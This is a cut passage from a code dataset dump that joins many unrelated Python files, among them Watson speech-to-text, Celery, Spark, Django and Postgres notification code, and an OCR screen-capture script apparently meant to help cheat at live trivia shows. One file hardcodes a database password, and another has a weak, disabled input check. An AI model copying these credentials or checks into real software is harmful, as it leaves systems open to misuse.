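message = 'bad geometry in [polygon 3]'          # contains a raw [
escaped = message.replace('[', '\\[').replace('"', '\\"')

try:
    tcl.eval('return -code error "%s"' % escaped)
except tk.TclError as err:
    print(err)   # -> bad geometry in [polygon 3]
```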
Saved for later.\n # \"\"\"\n\n # parts = re.findall(r'([\\w\\\\:\\.]+|\".*?\")+', text)\n # parts = [p.replace('\\n', '').replace('\"', '') for p in parts]\n # self.log.debug(parts)\n # try:\n # if parts[0] not in commands:\n # self.shell.append_error(\"Unknown command\\n\")\n # return\n #\n # #import inspect\n # #inspect.getargspec(someMethod)\n # if (type(commands[parts[0]][\"params\"]) is not list and len(parts)-1 != commands[parts[0]][\"params\"]) or \\\n # (type(commands[parts[0]][\"params\"]) is list and len(parts)-1 not in commands[parts[0]][\"params\"]):\n # self.shell.append_error(\n # \"Command %s takes %d arguments. %d given.\\n\" %\n # (parts[0], commands[parts[0]][\"params\"], len(parts)-1)\n # )\n # return\n #\n # cmdfcn = commands[parts[0]][\"fcn\"]\n # cmdconv = commands[parts[0]][\"converters\"]\n # if len(parts) - 1 > 0:\n # retval = cmdfcn(*[cmdconv[i](parts[i + 1]) for i in range(len(parts)-1)])\n # else:\n # retval = cmdfcn()\n # retfcn = commands[parts[0]][\"retfcn\"]\n # if retval and retfcn(retval):\n # self.shell.append_output(retfcn(retval) + \"\\n\")\n #\n # except Exception as e:\n # #self.shell.append_error(''.join(traceback.format_exc()))\n # #self.shell.append_error(\"?\\n\")\n # self.shell.append_error(str(e) + \"\\n\")\n","sub_path":"HSRWLaserTool_APP/FlatCAM_beta_8.994_sources/appTools/ToolShell.py","file_name":"ToolShell.py","file_ext":"py","file_size_in_byte":19668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"117235962","text":"from __future__ import unicode_literals\n\nfrom django.core.paginator import Paginator\n\nfrom celery.task import task\n\n\n@task\ndef dispatch_action(uid, data, dispatch=True):\n from sequere.backends.redis.connection import manager\n from sequere.models import get_followers\n\n from . import Timeline, Action\n\n logger = dispatch_action.get_logger()\n\n instance = manager.get_from_uid(uid)\n\n if not instance:\n logger.error('No instance found for uid: %s' % uid)\n else:\n action = Action.from_data(data)\n\n paginator = Paginator(get_followers(instance), 10)\n\n logger.info('Dispatch action %s to %s followers' % (action, paginator.count))\n\n for num_page in paginator.page_range:\n page = paginator.page(num_page)\n\n for obj, timestamp in page.object_list:\n if action.actor == obj:\n continue\n\n timeline = Timeline(obj)\n timeline.save(action, dispatch=dispatch)\n\n\ndef populate_actions(from_uid, to_uid, method, logger=None):\n from sequere.backends.redis.connection import manager\n\n from . 
import Timeline\n\n from_instance = manager.get_from_uid(from_uid)\n\n to_instance = manager.get_from_uid(to_uid)\n\n paginator = Paginator(Timeline(from_instance).get_public(), 10)\n\n timeline = Timeline(to_instance)\n\n if logger:\n logger.info('Populate (%s) %s with %s items from %s' % (method,\n to_instance,\n paginator.count,\n from_instance))\n\n for num_page in paginator.page_range:\n page = paginator.page(num_page)\n\n for action in page.object_list:\n getattr(timeline, method)(action, dispatch=False)\n\n\n@task\ndef import_actions(from_uid, to_uid):\n populate_actions(from_uid, to_uid, 'save',\n logger=import_actions.get_logger())\n\n\n@task\ndef remove_actions(from_uid, to_uid):\n populate_actions(from_uid, to_uid, 'delete',\n logger=remove_actions.get_logger())\n","sub_path":"sequere/contrib/timeline/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"163203140","text":"import jsonpickle\nfrom pyspark import SparkContext\nfrom pyspark import SparkConf\nimport sys\n\n\ndef run(sc, in_handle, out_handle):\n\n df = sc.textFile(str(in_handle))\n\n entire_kv_store = df.flatMap(jsonpickle.decode)\n\n edges = entire_kv_store\\\n .filter(lambda x: x[0] == 'own_edge')\\\n .map(lambda x: x[1])\n\n taint = entire_kv_store\\\n .filter(lambda x: x[0] == 'own_taint')\\\n .map(lambda x: x[1])\n\n neighbor_taint = edges.map(lambda x: (x[1], x[0]))\\\n .join(taint)\\\n .map(lambda x: (x[1][0], x[1][1]))\n\n updated_taint = taint.union(neighbor_taint)\\\n .reduceByKey(lambda x, y: x + y - x * y)\\\n .map(lambda x: ('own_taint', x))\n\n updated_kv_store = entire_kv_store\\\n .filter(lambda x: x[0] != 'own_taint')\\\n .union(updated_taint)\\\n .collect()\n\n out_handle.write(updated_kv_store)\n\nrun(sc, in_handle, out_handle)\n","sub_path":"src/example-tasks/reachability-mr.py","file_name":"reachability-mr.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"566155499","text":"import sys\n\ndef encode(input_enc, output_enc, word):\n encoding_values = ['utf8', 'bw', 'sbw']\n mode = input_enc + '_' + output_enc\n\n utf8 = u'\\u0621\\u0622\\u0623\\u0624\\u0625\\u0626\\u0627\\u0628\\u0629\\u062A\\u062B\\u062C\\u062D\\u062E\\u062F\\u0630\\u0631\\u0632\\u0633\\u0634\\u0635\\u0636\\u0637\\u0638\\u0639\\u063A\\u0640\\u0641\\u0642\\u0643\\u0644\\u0645\\u0646\\u0647\\u0648\\u0649\\u064A\\u064B\\u064C\\u064D\\u064E\\u064F\\u0650\\u0651\\u0652\\u0670\\u0671'\n bw = \"'|>&<}AbptvjHxd*rzs$SDTZEg_fqklmnhwYyFNKaui~o`{\"\n sbw = \"CMOWIQAbptvjHxdVrzscSDTZEg_fqklmnhwYyFNKauiXoeL\"\n\n\n if mode == 'utf8_bw':\n utf8_bw = str.maketrans(utf8, bw)\n return word.translate(utf8_bw)\n elif mode == 'utf8_sbw':\n utf8_sbw = str.maketrans(utf8, sbw)\n return word.translate(utf8_sbw)\n \n elif mode == 'bw_utf8':\n bw_utf8 = str.maketrans(bw, utf8)\n return word.translate(bw_utf8)\n elif mode == 'bw_sbw':\n bw_sbw = str.maketrans(bw, sbw)\n return word.translate(bw_sbw)\n \n elif mode == 'sbw_utf8':\n sbw_utf8 = str.maketrans(sbw, utf8)\n return word.translate(sbw_utf8)\n elif mode == 'sbw_bw':\n sbw_bw = str.maketrans(sbw, bw)\n return word.translate(sbw_bw)\n \n else:\n if input_enc not in encoding_values:\n print('Input encoding ' + input_enc + ' is not valid.')\n if output_enc not in encoding_values:\n print('Output encoding ' + output_enc + ' is not valid.')\n sys.exit(2)\n\n\ndef encode_file(input_enc, 
output_enc, input_file):\n try:\n text_file = open(input_file, 'r').read()\n out_text = open(input_file + '.' + output_enc, 'w')\n out_text.write(encode(input_enc, output_enc, text_file))\n out_text.close()\n except IOError as err:\n print(\"File cannot be opened:\", err)\n sys.exit(2)\n\n\nif __name__ == \"__main__\":\n encode_file('utf8', 'bw', 'example.txt')\n ","sub_path":"web-player/dialogue-manager/miscellaneous/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"52466970","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport curses\n\n# Initialize curses\nscreen = curses.initscr()\n# Do not echo typed characters\n# curses.noecho()\n# Respond to keys immediately, without waiting for Enter\n# curses.cbreak()\n# Enable keypad mode\nscreen.keypad(1)\n\n# nodelay: 0 = blocking reads, 1 = non-blocking\nscreen.nodelay(0)\n\nwhile True:\n char = screen.getch()\n # Act according to the value received\n # -1 means no input; anything else is the keyCode\n\n# Restore the console defaults (otherwise the console keeps no-echo mode even after the program exits)\n# curses.nocbreak()\n# screen.keypad(0)\n# curses.echo()\n# # End the curses window\n# curses.endwin()\n","sub_path":"1-python/1-python2/get-keyboard-event/get_Key_Event.py","file_name":"get_Key_Event.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"217064540","text":"#Leon Oram\r\n#16-12-2014\r\n#Dev task 1\r\n\r\nimport random\r\n\r\n\r\ndef ask(select,caps,countr):\r\n country = countr[select]\r\n capital = caps[select]\r\n answ = input(\"The capital of {0} is ... ? \".format(country))\r\n answ = answ.title()\r\n if answ == capital:\r\n print(\"That is correct!\")\r\n else:\r\n print(\"Incorrect! The capital is\",capital)\r\n \r\n\r\n\r\ndef main():\r\n caps = [\"Ottawa\",\"London\",\"Seoul\",\"Tokyo\",\"Pyongyang\",\"Moscow\",\"Washington\",\"Vatican City\",\"Kingston\",\"Canberra\"]\r\n countr = [\"Canada\",\"The United Kingdom\",\"South Korea\",\"Japan\",\"Best Korea\",\"Russia\",\"The USA\",\"Vatican City\",\"Jamaica\",\"Australia\"]\r\n select = random.randint(0,9)\r\n ask(select,caps,countr)\r\n \r\n \r\nuser = input(\"Please enter your name: \")\r\nuser = user.lower()\r\nif user != \"kieran\":\r\n main()\r\n","sub_path":"Dev 1.py","file_name":"Dev 1.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"208555313","text":"from django.conf.urls import include, url\nfrom . import views\n\nurlpatterns = [\n url(r'^contact', views.contact),\n url(r'^city/(?P<city>\w+)/', views.city_info),\n url(r'^lokafyer/(?P<lokafyer_id>\d+)/', views.lokafyer_info),\n url(r'^booking/request', views.booking_request),\n url(r'^booking/payment', views.booking_payment)\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"457144312","text":"# You need to install pyaudio to run this example\n# pip install pyaudio\n\n# When using a microphone, the AudioSource `input` parameter would be\n# initialised as a queue. 
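A compact sketch of the producer half this header describes: a pyaudio callback pushing raw chunks into a bounded queue and dropping chunks whenever the consumer lags. The rate/chunk values mirror the ones used later in this file but are otherwise arbitrary:

```python
# Sketch of the microphone-to-queue producer described above: pyaudio's
# callback runs on its own thread and feeds a bounded Queue; a slow
# consumer loses chunks instead of blocking the audio driver.
import pyaudio
from queue import Queue, Full

CHUNK = 1024
q = Queue(maxsize=10)

def on_audio(in_data, frame_count, time_info, status):
    try:
        q.put_nowait(in_data)      # hand the raw chunk to the consumer
    except Full:
        pass                       # consumer is behind: drop this chunk
    return (None, pyaudio.paContinue)

pa = pyaudio.PyAudio()
stream = pa.open(format=pyaudio.paInt16, channels=1, rate=44100,
                 input=True, frames_per_buffer=CHUNK,
                 stream_callback=on_audio)
stream.start_stream()
# ... a consumer drains q here (e.g. feeds it to a websocket client) ...
stream.stop_stream()
stream.close()
pa.terminate()
```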
The pyaudio stream would be continuosly adding\n# recordings to the queue, and the websocket client would be sending the\n# recordings to the speech to text service\n\n# https://stackoverflow.com/questions/6517953/clear-all-items-from-the-queue\n# https://stackoverflow.com/questions/48653745/continuesly-streaming-audio-signal-real-time-infinitely-python\n\nimport time\nimport sys\n\nimport pyaudio\n\nfrom ibm_watson import SpeechToTextV1\nfrom ibm_watson.websocket import RecognizeCallback, AudioSource\nfrom threading import Thread\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\n\nimport queue\nfrom queue import Empty\n\ntry:\n from Queue import Queue, Full\nexcept ImportError:\n from queue import Queue, Full\n\n###############################################\n#### Initalize queue to store the recordings ##\n###############################################\n\n\nclass stt_watson(object):\n # modifying IBM's class so it can be restarted\n # https://github.com/watson-developer-cloud/python-sdk/blob/master/ibm_watson/websocket/audio_source.py\n class AudioSource2(AudioSource):\n def restart_recording(self):\n self.is_recording = True\n\n # define callback for the speech to text service\n class MyRecognizeCallback(RecognizeCallback):\n def __init__(self, q):\n RecognizeCallback.__init__(self)\n self.transcript = \"no transcript\"\n self.q = q\n self.keep_thread_alive = True\n\n def on_transcription(self, transcript):\n pass\n\n def on_connected(self):\n print('Watson Connection was successful')\n pass\n\n def on_error(self, error):\n print('Watson Error received: {}'.format(error))\n #self.q.put((True, self.transcript))\n #self.q.put((True, \"timeout\"))\n #self.keep_thread_alive = False\n\n def on_inactivity_timeout(self, error):\n print('Watson Inactivity timeout: {}'.format(error))\n #self.q.put((True, self.transcript))\n #self.keep_thread_alive = False\n #thread.exit()\n\n def on_listening(self):\n print('Watson STT is listening...')\n\n def on_hypothesis(self, hypothesis):\n # print(\"hypo: \" + hypothesis)\n pass\n\n def on_data(self, data):\n print(\"ON_DATA:\",data)\n result = data['results'][0]['alternatives'][0]['transcript']\n final = data['results'][0]['final']\n self.transcript = result\n self.q.put((final, result))\n if (final):\n print(\"final: \" + result)\n else:\n print(\"interim: \" + result)\n\n def on_close(self):\n print(\"Watson closed Connection\")\n self.q.put((False, \"connectionClosed\"))\n time.sleep(2)\n self.keep_thread_alive = False\n # self.audio_paused = True\n # with self.q_soc.mutex:\n # self.q_soc.queue.clear()\n #thread.exit()\n\n def __init__(self, iamkey, url, lang, timeout):\n # if url == \"\" or url == \"default\":\n # url = \"https://stream.watsonplatform.net/speech-to-text/api\"\n # print(\"url: \" + url)\n #print(\"key: \" + iamkey)\n # self.speech_to_text = SpeechToTextV1(\n # iam_apikey=iamkey,\n # url=url)\n\n # try: self.thread_running\n # except NameError: self.thread_running = None\n\n print(\"Watson STT INIT STARTED\")\n\n self.iamkey = iamkey\n self.streaming = None\n self.recognize_thread = None\n self.need_restart = False\n\n self.CHUNK = 1024\n # Note: It will discard if the websocket client can't consumme fast enough\n # So, increase the max size as per your choice\n self.BUF_MAX_SIZE = self.CHUNK * 10\n\n # Variables for recording the speech\n self.FORMAT = pyaudio.paInt16\n self.CHANNELS = 1\n self.RATE = 44100\n\n # Buffer to store audio\n self.q_aud = Queue(maxsize=int(round(self.BUF_MAX_SIZE / self.CHUNK)))\n\n # queue 
for the websocket process to send to main\n self.q_soc = Queue()\n\n # queue to send data from main to websoc thread\n #self.q_proc = Queue()\n authenticator = IAMAuthenticator(self.iamkey)\n # if url == \"\" or url == \"default\":\n # url = \"https://stream.watsonplatform.net/speech-to-text/api\"\n self.speech_to_text = SpeechToTextV1(authenticator=authenticator)\n # Create an instance of AudioSource\n self.audio_source = self.AudioSource2(self.q_aud, True, True)\n # instantiate pyaudio\n self.audio = pyaudio.PyAudio()\n #self.FORMAT = self.audio.get_format_from_width(2)\n\n self.stream = self.audio.open(\n input_device_index = 1,\n format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n input=True,\n frames_per_buffer=self.CHUNK,\n stream_callback=self.pyaudio_callback,\n start=False\n )\n\n #self.audio_paused = True\n\n self.timeout = timeout\n\n langnew = self.get_lang(lang)\n #timeout = -1 # go forever\n # if hasattr(self,'thread_running'):\n # if not self.thread_running:\n print(\"spawn thread\")\n #self.recognize_thread = Thread(target=self.recog_thread, args=(self.q_soc,self.q_proc, self.audio, self.audio_source, self.stream, langnew, self.timeout))\n self.recognize_thread = Thread(target=self.recog_thread, args=(self.q_soc, self.audio, self.audio_source, self.stream, langnew, self.timeout))\n #recognize_thread.setDaemon(True)\n # self.test_thread = Thread(target=self.test, args=(\"a\"))\n self.recognize_thread.start()\n # self.test_thread.start()\n #self.thread_running = True\n print(\"finished spawn thread\")\n # self.keep_thread_alive = True\n\n def restart(self,langnew):\n # clean up before restarting thread\n\n # Buffer to store audio\n self.q_aud = Queue(maxsize=int(round(self.BUF_MAX_SIZE / self.CHUNK)))\n\n # queue for the websocket process to send to main\n self.q_soc = Queue()\n\n print(\"Restarting...Watson STT\")\n self.stream.stop_stream()\n self.stream.close()\n self.audio.terminate()\n self.audio_source.completed_recording()\n\n time.sleep(0.5)\n\n self.audio_source = self.AudioSource2(self.q_aud, True, True)\n self.audio = pyaudio.PyAudio()\n\n authenticator = IAMAuthenticator(self.iamkey)\n self.speech_to_text = SpeechToTextV1(authenticator=authenticator)\n self.stream = self.audio.open(\n input_device_index = 1,\n format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n input=True,\n frames_per_buffer=self.CHUNK,\n stream_callback=self.pyaudio_callback,\n start=False\n )\n\n lang = self.get_lang(langnew)\n self.recognize_thread = Thread(target=self.recog_thread, args=(self.q_soc, self.audio, self.audio_source, self.stream, lang, self.timeout))\n #recognize_thread.setDaemon(True)\n self.recognize_thread.start()\n #self.thread_running = True\n\n # define callback for pyaudio to store the recording in queue\n def pyaudio_callback(self, in_data, frame_count, time_info, status):\n try:\n self.q_aud.put(in_data)\n except Full:\n pass # discard\n return (None, pyaudio.paContinue)\n\n # this function will initiate the STT service and pass in the AudioSource\n def recog_thread(self, q_soc, audio, audio_source, stream, lang, timeout):\n print(\"starting Watson STT thread with lang: \" + lang)\n #print(\"lang: \" + lang)\n audio_source.restart_recording()\n stream.start_stream()\n\n mycallback = self.MyRecognizeCallback(q_soc)\n\n while mycallback.keep_thread_alive:\n #while True:\n print(\"recog_thread: starting websocket connection...\")\n try:\n self.speech_to_text.recognize_using_websocket(audio=audio_source,\n content_type='audio/l16; rate=44100',\n 
model=lang,\n input_device_index=1,\n recognize_callback=mycallback,\n interim_results=True,\n inactivity_timeout=timeout)\n except:\n print(\"Waston disconnected\")\n\n # shut it all down\n print(\"recogize_thread: shutting down...\")\n self.need_restart = True\n # stream.stop_stream()\n # stream.close()\n # audio.terminate()\n # audio_source.completed_recording()\n\n\n def get_lang(self, langnew):\n # https://cloud.ibm.com/docs/services/speech-to-text?topic=speech-to-text-models\n if langnew == \"\" or langnew == \"default\" or langnew == \"enUS\":\n lang = \"en-US_BroadbandModel\"\n elif langnew == \"enGB\":\n lang = \"en-GB_BroadbandModel\"\n elif langnew == \"deDE\":\n lang = \"de-DE_BroadbandModel\"\n elif langnew == \"esES\":\n lang = \"es-ES_BroadbandModel\"\n elif langnew == \"frFR\":\n lang = \"fr-FR_BroadbandModel\"\n elif langnew == \"koKR\":\n lang = \"ko-KR_BroadbandModel\"\n else:\n lang = \"en-US_BroadbandModel\"\n\n self.lang = langnew\n return lang\n\n ###############################################\n #### Initiate recognition ########\n ###############################################\n def transcribe(self, lang, time_limit):\n\n # if self.audio_paused:\n # print(\"transribe: restart\")\n # # self.stream.stop_stream()\n # #self.stream.start_stream()\n # # self.audio_paused = False\n # # self.thread_running = True\n # # self.keep_thread_alive = True\n # self.restart(lang)\n\n # if lang != self.lang or not self.thread_running:\n print(\"restart needed: \",self.need_restart)\n if lang != self.lang or self.need_restart:\n # print(\"Current language is: \" + self.lang + \" new lang is: \" + lang)\n # print(\"should be: restarting this process to change languages\")\n self.restart(lang)\n time.sleep(2)\n self.need_restart = False\n else:\n self.stream.start_stream()\n\n\n\n transcript = \"no transcription\"\n print(\"starting transcription...\")\n try:\n # recognize_thread = Thread(target=self.recognize_using_weboscket, args=(self.q,self.audio_source, lang, time_limit))\n # #recognize_thread.setDaemon(True)\n # recognize_thread.start()\n #self.recognize_using_weboscket(q,self.audio_source, lang, timeout)\n timeout = time.time() + time_limit\n print(time.time(),timeout)\n transcript = \"no transcription\"\n #status = False\n #while status == False and time.time() < timeout:\n #message = self.q_soc.get(True,1)\n self.q_soc.queue.clear()\n self.q_aud.queue.clear()\n while time.time() < timeout:\n try:\n message = self.q_soc.get(True,2)\n if message != None:\n print(\"Watson STT message:\",message[0],message[1])\n if message[0]:\n transcript = message[1]\n print(\"got a final: \" + transcript)\n break\n else:\n print(\"got an interim: \" + transcript)\n transcript = message[1]\n if message[1] == \"connectionClosed\":\n print(message[1],\"exiting due to Watson closing...\")\n self.need_restart = True\n break\n\n # if transcript == \"timeout\":\n # status = True\n # #transcript = \"no transcription\"\n # print(\"recognize: TIMEOUT\")\n # #self.thread_running = False\n\n except Empty:\n #except:\n pass\n #time.sleep(0.001)\n\n # if time.time() >= timeout:\n print(\"Completed transcribe()...\",time.time(),timeout)\n\n except BaseException as e:\n #except:\n print('Error: ' + str(e))\n print(\"all done...\")\n finally:\n print(\"Exiting transcribe()...\")\n self.stream.stop_stream()\n # self.audio_paused = True\n #self.stream.close()\n # self.audio.terminate()\n # self.audio_source.completed_recording()\n\n return transcript\n 
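Stripped of the Watson-specific plumbing, the transcribe loop above is a time-boxed queue drain: block briefly on get, remember the latest interim text, and stop early when a final flag arrives. A standalone reduction of that control flow (function and variable names are illustrative, not from the class above):

```python
# Standalone reduction of the transcribe() loop above: read (final, text)
# tuples from a queue until a final result arrives or the deadline passes.
import time
from queue import Queue, Empty

def drain_until_final(q, time_limit, poll=2.0):
    deadline = time.time() + time_limit
    latest = 'no transcription'
    while time.time() < deadline:
        try:
            final, text = q.get(True, poll)   # block at most `poll` seconds
        except Empty:
            continue                          # nothing yet, re-check deadline
        latest = text                         # keep the newest interim result
        if final:                             # a final hypothesis ends early
            break
    return latest
```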
#sys.exit()\n","sub_path":"raspi/delft-ai-toolkit/speech_to_text_watson-pause.py","file_name":"speech_to_text_watson-pause.py","file_ext":"py","file_size_in_byte":13030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"191062856","text":"import psycopg2\nfrom psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT\nfrom .models import *\nfrom django.db.models import Avg\nimport eventlet\nfrom eventlet import wsgi\nfrom eventlet import websocket\nfrom eventlet.hubs import trampoline\n\ndbname = 'seller_perf_tool'\nhost = 'localhost'\nuser = 'postgres'\npassword = 'postgres123'\n\ndsn = 'dbname=%s host=%s user=%s password=%s' % (dbname, host, user, password)\n\ndef func1():\n return Marks.objects.all().aggregate(Avg('english'))['english__avg']\n\ndef dblisten(q):\n \"\"\"\n Open a db connection and add notifications to *q*.\n \"\"\"\n cnn = psycopg2.connect(dsn)\n cnn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n cur = cnn.cursor()\n cur.execute(\"LISTEN tester;\")\n while 1:\n trampoline(cnn, read=True)\n cnn.poll()\n while cnn.notifies:\n n = cnn.notifies.pop()\n q.put(n)\n\n@websocket.WebSocketWSGI\ndef handle(ws):\n \"\"\"\n Receive a connection and send it database notifications.\n \"\"\"\n q = eventlet.Queue()\n eventlet.spawn(dblisten, q)\n while 1:\n n = q.get()\n avg = func1()\n print(avg)\n print(n)\n #ws.send(n.payload)\n ws.send(str(avg))\n\ndef dispatch(environ, start_response):\n if environ['PATH_INFO'] == '/tester':\n return handle(environ, start_response)\n else:\n start_response('200 OK',\n [('content-type', 'text/html')])\n return [page]\n\ndef run():\n listener = eventlet.listen(('127.0.0.1', 8080))\n wsgi.server(listener, dispatch)\n\n\npage = \"\"\"\n\n pushdemo\n \n \n \n \n \n
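The dblisten loop above only wakes up when some other database session fires a NOTIFY on the tester channel. A minimal, hypothetical companion sender, assuming the same DSN as the listener (pg_notify is used because a bare NOTIFY statement does not accept bound parameters):

```python
# Hypothetical companion to dblisten() above: a second session that fires
# the 'tester' channel so the websocket handler pushes an update.
# Assumes the same dsn as the listener; the payload is arbitrary here.
import psycopg2
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT

def notify(dsn, payload=''):
    cnn = psycopg2.connect(dsn)
    cnn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)  # NOTIFY needs commit
    cur = cnn.cursor()
    cur.execute("SELECT pg_notify('tester', %s);", (payload,))
    cnn.close()
```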
\n \n\n"""","sub_path":"performance_app/pubsub.py","file_name":"pubsub.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"566471081","text":"\"\"\"Custom template tags that provide utility functionality.\"\"\"\n\nimport json\n\nfrom django import template\n\nregister = template.Library()\n\n\n@register.filter\ndef asjson(json_str):\n \"\"\"Convert the given JSON object into a string.\"\"\"\n if json_str is None:\n json_str = 'null'\n elif not isinstance(json_str, (bytes, str)):\n json_str = json.dumps(json_str)\n\n return json_str\n","sub_path":"calchart/calchart/templatetags/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"226525546","text":"# import json\n\nfrom django.core.files import File\nfrom tcp.protocol import *\nfrom tcp.db import DBEngine\nimport pymysql.err\n\n\nclass UpgradeBase(Exception):\n \"\"\"Exception related to operation with Upgrade\"\"\"\n\n\nclass UpdateSendOrderError(UpgradeBase):\n \"\"\"SendOrder not equal\"\"\"\n\n\nclass UpdateFileNotFoundError(UpgradeBase):\n \"\"\"The file was deleted while the upgrade was in progress\"\"\"\n\n\nclass UpdateFile(object):\n def __init__(self, db_file):\n # File field object returned by the Django ORM\n # self.db_file = db_file\n self.filename = db_file.ufile.name\n self.filesize = db_file.ufile.size\n self.filepath = db_file.ufile.path\n self.sendorder = 0\n # Total size of the whole file\n\n # Size of each program chunk to send\n self.chunksize = 7\n # Amount already sent\n self.sendalready = 0\n self.finish = 0\n\n def getFileName(self):\n return self.filename.split('./')[1]\n\n def getFileSize(self):\n return self.filesize\n\n def getFilePath(self):\n return self.filepath\n\n def getSendOrder(self):\n return self.sendorder\n\n # After closing the file it has to be fetched from the database again\n def getNextSendChunk(self, sorder):\n self._setSendOrder(sorder)\n with open(self.filepath) as f:\n f.seek(self.sendalready)\n self._setSendAlready()\n chunksize = self._getSendSize()\n return f.read(chunksize), chunksize\n\n def _setSendOrder(self, sorder):\n if self.sendorder == sorder:\n self.sendorder += 1\n else:\n raise UpdateSendOrderError\n\n def _setSendAlready(self):\n self.sendalready += self.chunksize\n if self.sendalready >= self.filesize:\n self.sendalready = self.filesize\n self.finish = 1\n\n def _getSendSize(self):\n if self.sendalready == self.filesize:\n return self.sendalready - self.chunksize * (self.sendorder - 1)\n return self.chunksize\n\n def getNext(self, order):\n # On the first call, send the first chunk regardless of what was received\n if self.sendorder == 0:\n pass\n else:\n # Check that the received order matches the one we sent\n if self.sendorder != order:\n raise UpdateSendOrderError\n self.sendorder += 1\n try:\n with open(self.filepath) as f:\n f.seek(self.sendalready)\n self._setSendAlready()\n chunksize = self._getSendSize()\n return f.read(chunksize), chunksize\n except FileNotFoundError:\n raise UpdateFileNotFoundError\n\n\nclass UpgradeCode(object):\n def __init__(self):\n self.dbEngine = DBEngine()\n self.updateFile = None\n\n @staticmethod\n def findBadInput(inputString):\n if '\\'' in inputString or '\\\"' in inputString \\\n or '`' in inputString or ' ' in inputString:\n return True\n\n def handlePackge(self, connection, packge):\n if isinstance(packge, PackgeQuery):\n self.handleQuery(connection, packge)\n\n elif isinstance(packge, PackgeUpgrade):\n self.handleUpgrade(connection, packge)\n\n def handleQuery(self, connection, packge):\n\n retPackge = SendToClientPackge('check')\n # if self.findBadInput(packge.username) or 
self.findBadInput(packge.softversion):\n # retPackge.errcode = PACKAGE_ERRCODE_INPUTWRONG\n\n db_file = self.dbEngine.getNewFileWithCodeType(packge.codetype)\n if db_file:\n self.updateFile = UpdateFile(db_file)\n retPackge.status = 1\n fname = self.updateFile.getFileName()\n fsize = self.updateFile.getFileSize()\n retPackge.obj = SendToClientPackgeQuery(fname, fsize)\n\n else:\n retPackge.errcode = PACKAGE_ERRCODE_NOUPDATEAVAILABLE\n\n connection.send_message(json.dumps(retPackge, cls=ComplexEncoder))\n\n def handleUpgrade(self, connection, packge):\n retPackge = SendToClientPackge('load')\n if self.updateFile:\n if not self.updateFile.finish:\n try:\n chunk, chunksize = self.updateFile.getNext(packge.forder)\n retPackge.status = 1\n retPackge.obj = SendToClientPackgeUpgrade(chunk, self.updateFile.sendorder, chunksize)\n except UpdateSendOrderError:\n retPackge.errcode = PACKAGE_ERRCODE_SENDORDERERROR\n except UpdateFileNotFoundError:\n retPackge.errcode = PACKAGE_ERRCODE_INTTERNALERROR\n\n else:\n retPackge.errcode = PACKAGE_ERRCODE_NOTHINGLEFT\n\n else:\n retPackge.errcode = PACKAGE_ERRCODE_NOCHECKNEW\n\n connection.send_message(json.dumps(retPackge, cls=ComplexEncoder))\n","sub_path":"InternalServer/tcp/updatefile.py","file_name":"updatefile.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"438481709","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport re\n# import os\nimport win32gui, win32ui, win32con, win32api\nfrom PIL import Image\nimport pytesseract\n\ndef binarizing(img,threshold): # Binarize the image\n pix_data = img.load()\n w, h = img.size\n for y in range(h):\n for x in range(w):\n if pix_data[x, y] < threshold:\n pix_data[x, y] = 0\n else:\n pix_data[x, y] = 255\n return img\n\ndef window_capture(filename1, filename2):\n hwnd = 0\n hwndDC = win32gui.GetWindowDC(hwnd)\n mfcDC = win32ui.CreateDCFromHandle(hwndDC)\n saveDC = mfcDC.CreateCompatibleDC()\n saveBitMap = win32ui.CreateBitmap()\n # MoniterDev = win32api.EnumDisplayMonitors(None, None)\n # w = MoniterDev[0][2][2]\n # h = MoniterDev[0][2][3]\n w1 = 380\n h1 = 150\n w2 = 380\n h2 = 190\n height = 200\n saveBitMap.CreateCompatibleBitmap(mfcDC, w1, h1)\n saveDC.SelectObject(saveBitMap)\n saveDC.BitBlt((0, 0), (w1, h1), mfcDC, (20, height), win32con.SRCCOPY)\n saveBitMap.SaveBitmapFile(saveDC, filename1)\n saveBitMap.CreateCompatibleBitmap(mfcDC, w2, h2)\n saveDC.SelectObject(saveBitMap)\n saveDC.BitBlt((0, 0), (w2, h2), mfcDC, (20, h1 + height), win32con.SRCCOPY)\n saveBitMap.SaveBitmapFile(saveDC, filename2)\n\n\n# 冲顶大会: offset 170 without the top frame, 200 with it\n# 花椒直播-百万赢家: offset 166 without the top frame, 170 with it\ndef ocr():\n window_capture('Que_ocr.jpg', 'Ans_ocr.jpg')\n Que_img = Image.open('Que_ocr.jpg')\n Que_ocr = pytesseract.image_to_string(Que_img, lang='chi_sim').replace(' 